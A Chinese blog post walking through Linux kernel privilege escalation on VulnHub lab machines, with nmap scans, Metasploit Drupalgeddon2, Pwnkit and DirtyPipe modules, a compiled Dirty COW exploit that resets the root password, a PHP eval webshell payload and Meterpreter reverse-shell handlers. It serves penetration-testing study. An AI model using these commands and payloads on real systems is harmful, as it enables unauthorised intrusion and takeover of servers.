Linux权限提升-内核溢出

于 2024-08-31 18:34:40 发布
阅读量433 收藏 15
点赞数 17
分类专栏: Linux权限提升 文章标签: linux 运维 服务器 内网渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53736204/article/details/141756518
版权

Linux权限提升-内核溢出

➢ Web到Linux-内核溢出

#权限认知

系统⽤户:UID(0-999)

普通⽤户:UID(1000-*)

root⽤户:UID为0,拥有系统的完全控制权限

#信息收集

当前主机的操作系统
hostnamectl
cat /etc/*-release
lsb_release -a
cat /etc/lsb-release # Debain
cat /etc/redhat-release # Redhat
cat /etc/centos-release # Centos
cat /etc/os-release # Ubuntu
cat /etc/issue
当前主机的内核版本
hostnamectl
uname -a
cat /proc/version
dmesg | grep "Linux version"

实例

└─# uname -a

image-20240831151625719

➢ Web到Linux-提权项目

#内核漏洞筛选:

MSF检测:(不好⽤)
run post/multi/recon/local_exploit_suggester

提权脚本:(只针对内核漏洞检测)
https://github.com/liamg/traitor
https://github.com/The-Z-Labs/linux-exploit-suggester
https://github.com/jondonas/linux-exploit-suggester-2
https://github.com/belane/linux-soft-exploit-suggester
有py、pl、sh脚本推荐sh脚本

综合脚本:(含提权内核漏洞和配置不当⽐如suid等提取检测,但是不完整)
https://github.com/carlospolop/PEASS-ng
https://github.com/diego-treitos/linux-smart-enumeration
https://github.com/redcode-labs/Bashark
https://github.com/rebootuser/LinEnum

#应用场景:

获取到Web权限在Linux服务器上时进⾏的内核漏洞提权

#常见内核漏洞案例:

windows是⼟⾖系,linux是脏⽜系。

dirtycow(CVE-2016-5159)
Pwnkit (CVE-2021-4034)
Dirty Pipe(CVE-2022-0847)
SUDO (CVE-2021-3156)
⼤脏⽜ (CVE-2017–1000405)
CVE-2017-16995
CVE-2021-3560
CVE-2023-1829 
CVE-2022-2588
CVE-2021-3493
CVE-2022-32250
CVE-2023-3269
CVE-2022-0995
CVE-2022-2639
CVE-2023-0386
...

➢ Web到Linux-内核溢出Dcow

1. 简要步骤

复现环境:https://www.vulnhub.com/entry/lampiao-1,249/
1、信息收集:
nmap -p1-65535 192.168.139.0/24
2、Web漏洞利⽤:
search drupal
use exploit/unix/webapp/drupal_drupalgeddon2
set rhost 192.168.46.144
set rport 1898
run
3、内核提权:
upload /root/linux-exploit-suggester.sh /tmp/1.sh
shell
cd /tmp
chmod +x 1.sh
./1.sh
https://github.com/gbonacini/CVE-2016-5195
upload /root/dcow.cpp /tmp/dcow.cpp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil
python -c 'import pty; pty.spawn("/bin/bash")'
./dcow
su root

2. 详细过程

复现环境:https://www.vulnhub.com/entry/lampiao-1,249/

解压Lampiao.zip导⼊虚拟机即可

2.1. 信息收集:
# 探测⽬标ip及开发端⼝
└─# nmap -p1-65535 192.168.197.0/24
# 为了节省时间不进⾏全端⼝扫描
└─# nmap 192.168.197.0/24

发现⽬标http://192.168.197.146/同时也该ip也开放了1898端⼝http://192.168.197.146:1898/

image-20240831153854316

image-20240831153944788

发现该⽹址是Drupal编写,所以我们进⼊msf进⾏查找是否有漏洞利⽤模块

image-20240831154007678

用Tide指纹探测工具探测出

image-20240831155355990

该网站漏洞编码为cve-2018-7600

image-20240831155254724

2.2. Web漏洞利用:
# 查找drupal相关漏洞
search drupal
# 进⾏漏洞利⽤
use exploit/unix/webapp/drupal_drupalgeddon2
set rhost 192.168.197.146
set rport 1898
run

image-20240831155532371

成功获取到⽬标主机权限

image-20240831155804854

2.3. 内核提权:
# 上传内核漏洞检测脚本
upload /root/linux-exploit-suggester-master/linux-exploit-suggester.sh /tmp/1.sh
# 进⼊shell,并执⾏提权辅助脚本
shell
cd /tmp
chmod +x 1.sh
./1.sh

image-20240831161857826

https://github.com/gbonacini/CVE-2016-5195

# 发现提权漏洞,上传提权利⽤程序dcow.cpp到服务器
exit
upload /root/dcow.cpp /tmp/dcow.cpp

# 进⾏提权操作
shell
cd /tmp

# 编译漏洞利⽤程序成功后会在当前⽬录⽣成dcow
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil
ls

# 由于本身的终端问题,所以使⽤python终端
python -c 'import pty; pty.spawn("/bin/bash")'
./dcow

# 漏洞利⽤成功后使⽤root⽤户密码dirtyCowFun进⾏登录即可
su root
whoami

成功利⽤漏洞修改root密码为dirtyCowFun

image-20240831163501732

成功登录root账号

image-20240831162953530

image-20240831163455468

➢Web到Linux-内核溢出Pwnkit

1. 简要步骤

复现环境:https://www.vulnhub.com/entry/darkhole-1,724/
1、信息收集:
nmap -p1-65535 192.168.139.0/24
2、Web漏洞利⽤:
重置管理密码-上传1.phtml-反弹MSF
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 6666
run
3、内核提权
upload /root/linux-exploit-suggester.sh /tmp/1.sh
shell
cd /tmp
chmod +x 1.sh
./1.sh
search cve_2021_4034
use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
set session x
run
getuid
shell
cd /root
cat root.txt

2.详细步骤

复现环境:https://www.vulnhub.com/entry/darkhole-1,724/

解压DarkHole.zip导⼊虚拟机即可。

2.1. 信息收集:
# 探测⽬标ip及开发端⼝
└─# nmap -p1-65535 192.168.139.0/24
# 为了节省时间不进⾏全端⼝扫描
└─# nmap 192.168.220.0/24

image-20240831165755471

image-20240831165840621

2.2. Web漏洞利⽤:
2.2.1. 重置管理密码

image-20240831170213644

image-20240831170229094

image-20240831170316024

使⽤注册⽤户登录,并重置密码,发现数据包中有id=2

image-20240831170503395

城市修改id=1进⾏管理员密码重置并使⽤admin/123456进⾏登录

image-20240831170551796

image-20240831170619244

2.2.2. 上传1.phtml

发现管理员后台有⼀个上传点,直接上传后缀为.phtml后缀的哥斯拉php⽊⻢。

image-20240831170756958

哥斯拉连接⼀句话⽊⻢

192.168.197.147/upload/1.phtml

image-20240831170933526

2.2.3. 反弹MSF

将内核检测脚本和综合检测脚本都上传到⽬标服务器的/tmp⽬录

image-20240831171204658

进⾏提权漏洞检测,发现哥斯拉上执⾏提权辅助脚本后容易卡死,⽽且出现结果后很乱

cd /tmp
chmod +x linpeas.sh
chmod +x linux-exploit-suggester.sh
./linpeas.sh

image-20240831171426850

所以我们使⽤msf的反弹shell⽐较好

# 启动msf
└─# msfdb run
# 监听本地6666端⼝等待php反弹后⻔连接
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 6666
run

进⼊哥斯拉反弹模块即可

image-20240831171647142

2.3. 内核提权
# 上传提权辅助脚本
upload /root/linux-exploit-suggester.sh /tmp/linux-exploit-suggester.sh
upload /root/linpeas.sh /tmp/linpeas.sh
# 进⼊shell
shell
cd /tmp
chmod +x linpeas.sh
chmod +x linux-exploit-suggester.sh
# 综合辅助脚本
./linpeas.sh
# 内核辅助脚本
./linux-exploit-suggester.sh

image-20240831171930076

MSF检测:(不好⽤)

# 退出shell
exit
# 保存会话到后台
background
# 使⽤msf⾃带检测模块
use post/multi/recon/local_exploit_suggester
set SESSION 1
run

msf的该模块不太好⽤,没检测到,不如我们上述的两个项⽬。该模块类似windows⾃动提权的模块

image-20240831172050295

cve_2021_4034提权漏洞利⽤

# 查找漏洞利⽤模块
search cve_2021_4034
# 使⽤提权漏洞利⽤模块
use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
set session 1
run
# 在获取的shell中查看当前⽤户权限
getuid
shell
cd /root
cat root.txt

image-20240831172255040

➢Web到Linux-内核溢出-DirtyPipe

1.简要步骤

#Linux系统提权-Web&内核溢出-DirtyPipe
https://www.vulnhub.com/entry/matrix-breakout-2-morpheus,757/
1、信息收集:
nmap -p1-65535 192.168.139.0/24
2、Web漏洞利⽤
扫描发现-抓包分析-⽂件写⼊-反弹MSF
gobuster dir -u http://192.168.139.146 -x php,bak,txt,html -w /usr/share/d
irbuster/wordlists/directory-list-2.3-medium.txt
message=<?php eval($_POST["pass"]);?>&file=xd.php
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 6666
run
3、内核提权
upload /root/linux-exploit-suggester.sh /tmp/1.sh
shell
cd /tmp
chmod +x 1.sh
./1.sh
search cve_2022_0847
use exploit/linux/local/cve_2022_0847_dirtypipe
set session x
set lhost xx.xx.xx.xx
run
#补充
CVE-2023-0386
https://mp.weixin.qq.com/s/Z6sVuMrYMZV8WD6z1-U95Q

2.详细步骤

复现环境:https://www.vulnhub.com/entry/matrix-breakout-2-morpheus,757/

导⼊matrix-breakout-2-morpheus.ova到虚拟机即可

2.1. 信息收集:
# 探测⽬标ip及开发端⼝
└─# nmap -p1-65535 192.168.139.0/24
# 为了节省时间不进⾏全端⼝扫描
└─# nmap 192.168.220.0/24

image-20240831175658858

2.2. Web漏洞利用
2.2.1. 目录扫描

使⽤御剑也⾏,重点是字典⾥有

└─# apt install gobuster
└─# gobuster dir -u http://192.168.220.159 -x php,bak,txt,html -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

发现敏感⽂件

image-20240831180504215

2.2.2. 抓包分析

访问http://192.168.220.159/graffiti.php进⾏功能测试并抓包

image-20240831180812141

发现post部分有graffiti.txt访问测试下http://192.168.220.159/graffiti.txt

image-20240831180835262

发现1111是我们写⼊的内容,graffiti.txt是⽂件名

2.2.3. 文件写入

那么我们可以尝试写⼊⼀句话⽊⻢到php⽂件

# ⼀句话⽊⻢
<?php eval($_POST["pass"]);
# ⼀句话⽊⻢
message=%3C%3Fphp+eval%28%24_POST%5B%22pass%22%5D%29%3B&file=rsec.php

发送恶意代码,并使⽤哥斯拉连接http://192.168.220.159/rsec.php

image-20240831181058120

image-20240831181142129

2.2.4. 反弹MSF
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 6666
run

使⽤哥斯拉反弹到msf

image-20240831181410486

2.3. 内核提权
# 上传提权内核漏洞检测辅助脚本
upload /root/linux-exploit-suggester.sh /tmp/1.sh

# 进⼊shell进⾏提权漏洞检测
shell
cd /tmp
chmod +x 1.sh
./1.sh

image-20240831181933505

# 退出shell模式
exit
# 保存会话到后台
background
# 查找漏洞利⽤程序,如果msf没有再去别的地⽅查找
search cve_2022_0847
use exploit/linux/local/cve_2022_0847_dirtypipe
set session x
# 注意设置0.0.0.0容易失败
set lhost 192.168.197.135
run
getuid
shell
cat /root/FLAG.txt

image-20240831182427155

2.4. #补充

CVE-2023-0386

https://mp.weixin.qq.com/s/Z6sVuMrYMZV8WD6z1-U95Q

黑白时光les
关注
  • 17
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
权限提升-windows内核溢出漏洞提权
weixin_39430198的博客
03-14 1700
一、课时目标 1、理解权限提升的原理和目的 2、掌握常规提权的思路和方法 二、权限提升 2.1 什么是提权 提权,就是提高自己在服务器中的权限。比如在windows下从普通用户提升到administrator或者system权限linux下普通用户提升到root权限。 2.2 为什么要提权 用户的权限决定了其能够访问的资源。在渗透测试中,我们通过某种方式(比如上传webshell)获取到一个执行命令的shell,但它是一个低权限用户,所以不能执行某些系统命令或者访问某些关键系统资源。此时如果我们想要获取更
linux3.13.0内核溢出漏洞exp,Linux Kernel Pwn 学习笔记(栈溢出)
weixin_42558758的博客
05-06 486
0x01 背景栈溢出是最基本的一个漏洞,学习 pwn 从栈溢出开始学习是比较简单的入门方式。之前也研究过 linux 内核,但因为种种原因不得不放弃。现在跟着安卓版主学习了几天linux内核漏洞,收获了不少知识,开始自己梳理和分享自己的笔记,特此感谢版主老师的教导0x02 内核基本知识Canary: 是防止栈溢出的保护,一般在 ebp-0x8 的位置,学习 linux pwn 的基本知识,不细讲K...
权限提升-Linux系统权限提升篇&内核溢出&辅助项目&Vulnhub&Dirty Pipe&Pwnkit&dirtycow
siu~
03-29 967
1、Web到Linux-内核溢出-权限认知&信息收集 2、Web到Linux-提权项目-漏洞筛选&配置安全 3、Web到Linux-内核溢出-dirtycow(CVE-2016-5159) 4、Web到Linux-内核溢出-Pwnkit (CVE-2021-4034) 5、Web到Linux-内核溢出-DirtyPipe (CVE-2022-0847) 章节点: 1、Web权限提升及转移 2、系统权限提升及转移 3、宿主权限提升及转移 4、域控权限提升及转移
02-权限提升-Win溢出漏洞及AT&SC&PS提权
qq_56414082的博客
05-04 792
明确权限提升基础知识:权限划分明确权限提升环境问题:web及本地明确权限提升方法针对:针对方法适应问题明确权限提升针对版本:个人及服务器版本;针对方法;Windows系统内置了许多本地用户组,这些用户组本身都已经被赋予一些权限(permissions),它们具有管理本地计算机或访问本地资源的权限。只要用户账户加入到这些本地组内,这些用户账户也将具备该组所拥有的权限
Linux权限提升内核、SUID、脏牛等提权
剁椒鱼头没剁椒的博客
04-02 3279
关于Linux系统提权的前置知识其实和Windows系统提权是一致的,只是在系统位置,由Windows系统更换为Linux系统而已。权限提升的本质就是通过低权限的账户转换为高权限账户,通过获取高权限账户去做想要做的事情。同时在内核提权提权的时候,需要注意有些内核漏洞需要使用到本地用户去提权,也就是非web权限,但是有些漏洞可以无视权限都可以进行提权,这一点需要注意。至于其它的命令使用方式,可以在给予的网站中去查找相关的使用方式,这里就不再进行演示了。漏洞信息:CVE-2016-5195漏洞。
Linux内核漏洞提权
qq_61553520的博客
05-31 1389
当SUID权限被设置在一个可执行文件上时,执行该文件的用户将以文件所有者的身份执行,即使该用户没有相应的权限。举例:test.sh原来的权限是-rwxr-xr-x,当执行chmod u+s test.sh命令后,它的权限就会变成-rwsr-xr-x。SUID可以让调用者以文件拥有者的身份运行该文件,所以我们利用SUID提权的思路就是运行root用户所拥有的SUID的文件,那么我们运行该文件的时候就得获得root用户的身份了。执行以下命令,确认以root身份运行。的形式运行命令时,使用的是root身份。
权限提升-linux提权手法总结.zip
05-08
Linux系统中,权限提升(Privilege Escalation)是指非特权用户通过各种手段获取到更高的权限,如root权限,从而能够对系统进行更广泛的操作。这种行为在系统安全领域中具有重要意义,既包括攻击者试图提升权限以...
linux-kernel-exploitation:与Linux内核安全性和利用有关的链接的集合
02-05
"linux-kernel-exploitation"项目集合了一系列与Linux内核安全相关的链接,这包括漏洞分析、exploit开发、权限提升和安全防护等方面的知识。 1. **Linux内核漏洞**:内核中的漏洞可能源于编程错误,如缓冲区溢出、...
CVE-2020-14386:Linux内核权限提升漏洞分析 .pdf
09-05
Linux内核权限提升漏洞CVE-2020-14386详解》 Linux内核是操作系统的核心,负责管理和调度系统资源,确保系统的稳定和安全。然而,任何软件都可能存在漏洞,Linux内核也不例外。CVE-2020-14386是一个严重的权限...
Linux基础知识(一、什么是Linux
心寒的博客
08-26 1919
什么是Linux Linux创始人
Linux中的常见命令——用户管理命令
qq_45569925的博客
08-27 1337
默认创建用户的时候会在home文件夹下创建一个与用户同名的文件夹【该用户的主目录】,也可以在创建用户的时候设置该用户主目录的名称。【输入的密码是不在控制台显示的,输入完之后直接按回车键即可】使用wgh用户查看root下的文件。【此时的用户是没有密码的】给创建的用户设置密码。查看某个用户是否存在。
linux 系统性能调优技巧
m0_50641264的博客
08-27 1108
【代码】linux 系统性能调优技巧。
Linux 常用命令 - lsblk 【查看磁盘(块设备)使用情况】
随便转转
08-27 1155
lsblk源自于 “list block devices” 的缩写。这个命令用于列出系统中的所有块设备(block devices),比如硬盘、光驱等。它展示块设备的层次结构、大小和挂载点等信息,非常有助于系统管理员理解系统存储结构。
linux 系统如何进行nfs(第五节)
最新发布
weixin_44767571的博客
08-30 153
首先是 在虚拟机中的操作。然后是在开发板上的操作。
Linux报错:make[2]: *** No rule to make target ‘/usr/local/lib/libopus.a‘
VIFIN的博客
08-27 721
解决报错:make[2]: *** No rule to make target '/usr/local/lib/libopus.a'
LinuxLinux Bash Shell 教程
Young_Pro的博客
08-27 1504
Linux bash(Bourne-Again SHell)是一种为GNU操作系统编写的命令行解释器,它是大多数Linux发行版中最常用的shell。Bash提供了一种强大的方式来控制和管理操作系统,支持命令历史记录、别名、管道、重定向、变量、条件判断、循环以及自定义脚本编写等功能,使得用户能够通过简单的命令行指令执行复杂的任务,是系统管理员和开发人员日常工作中的得力工具。
等保-Linux等保测评
2301_82000839的博客
08-26 558
等保-Linux等保测评
RockPI 4A单板Linux 4.4内核下的RK3399 GPIO功能解析
m0_67544708的博客
08-26 1411
在GPIO方面,RK3399提供了多达16个GPIO控制器,每个控制器可配置的GPIO引脚数量不等。通过详细的代码解析和示例,帮助读者理解如何在Linux内核中使用GPIO,以及如何通过GPIO实现单板的基本控制和功能扩展。为了更好地理解如何在Linux内核中使用RK3399的GPIO功能,下面是一个简单的示例代码,展示了如何通过GPIO控制LED灯的亮灭。函数,用于设置GPIO引脚的方向。在设置GPIO引脚方向为输出模式后,可以设置GPIO引脚的值。在获取GPIO引脚后,可以设置GPIO引脚的方向。
Linux——进程管理
m0_67677309的博客
08-29 1404
1、通过fork创建的子进程会拷贝父进程(数据段、bss段、堆、栈、I/O缓冲区),与父进程共享代码段、子进程会继承父进程的信号处理方式。ITIMER_VIRTUAL 虚拟计时器 用户态的计时SIGVTALRM(26)**使用的时候要对应。ITIMER_REAL 真实计时器 程序总的计时时间SIGALRM(14)void (*sa_restorer)(void);// 第一次产生时钟信号的时间 **3秒钟一次,每个两秒。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值